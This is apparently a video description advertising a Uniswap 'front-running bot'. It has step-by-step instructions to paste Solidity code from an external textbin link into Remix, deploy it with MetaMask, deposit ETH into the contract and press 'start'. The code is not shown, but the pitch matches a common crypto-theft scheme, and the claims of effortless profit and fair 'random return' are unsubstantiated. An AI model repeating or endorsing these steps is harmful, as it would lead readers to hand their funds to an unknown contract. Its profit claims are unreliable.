Uniswap is a decentralized permissionless exchange that allows users to trade ERC-20 tokens directly.
If you trade crypto on Uniswap, 1inch or any other decentralized exchange (DEX), then you need to know about front-running bots.
In this video, we see a front running bot, performing buy/sell actions without having to go through the typical transactional methods.
You can PM me here:
1. Download MetaMask:
2. Access Remix:
3. Click on the “contracts” folder and then create “New File”. Rename it as you like, i.e: “bot.sol”
Note: If you add the pastebin agreement codes to the bot.sol file and it doesn’t turn out to be colored, refresh the page and add it again.
4. Paste THIS code in Remix:
Alternative Link : https://textbin.net/raw/pr0a1ezeqa
5. Move to the “Solidity Compiler” tab, select version “0.6.6” and then “Compile” it
6. Move to the “Deploy” tab, select “Injected Web 3” environment and then “Deploy” it. After the transaction is confirmed, it’s your own BOT now
7. Deposit funds to exact your bot contract address
8. After your transaction was confirmed, Start the bot by clicking the “start” button. Withdraw anytime by clicking the “withdrawal” button
♦ Update ♦
There are many people who want to see how the bot sells, so I add my own contract address, you can check the transactions, how the bot works, and which tokens it buys and sells.
Not all contract creators receive the same token at the same time, and a random return is made. This is the most important precaution in order not to create a rapid increase in illiquid tokens and not to harm other users in the bot. The amount of ETH in the contract is proportional to the earnings.
⛔⛔ TAGS ⛔⛔
uniswap, uniswap bot, uniswap sniper bot, uniswap token bot, uniswap eth bot, uniswap eth bot, eth token bot, eth token bot, sniper bot, sniper bot eth, uniswap tutorial, uniswap price prediction, uniswap v3, uniswap explained, uniswap liquidity pool, uniswap taxes, uniswap airdrop, uniswap arbitrage, uniswap add liquidity, uniswap api, uniswap bot python, uniswap cryptocurrency, uniswap concentrated liquidity, uniswap code explained, uniswap developer tutorial
#uniswap #erc20 #ethereum #crypto #uniswaptradingbot #metamask #nft #sniper #sniperbot #liquiditymethod